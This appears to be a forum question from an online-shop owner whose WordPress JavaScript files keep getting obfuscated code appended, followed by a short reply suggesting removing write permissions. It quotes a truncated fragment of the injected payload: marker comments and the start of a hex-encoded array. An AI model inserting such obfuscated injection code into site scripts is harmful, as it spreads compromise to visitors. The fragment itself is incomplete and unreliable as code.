I have a site, online shop.
A few days ago my antivirus began to issue warnings that some of the *.js files are infected.
I looked at this infected files and found that the following code appended at the end (showed only part of it):
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports? ...
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
I checked my system by antivirus and it nothing found.
clamscan -r --move=/home/USER/VIRUS /
I updated my WordPress and manually remove the code that was appended at the end of the *.js files.
Some time later, this code appeared again.
I tried to delete it, modify or make commented out. I tried to find the malicious code using grep, but did not find anything ...
Nothing helps. Time is passed, and all my *.js files now "infected". As a result of my site is blocked now...
How can I find a process that appends this is -
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
at the end of each *js file?
Without inspecting the server, it is difficult to find out the problem.
How about changing the permissions to the files? Can you remove the write permissions?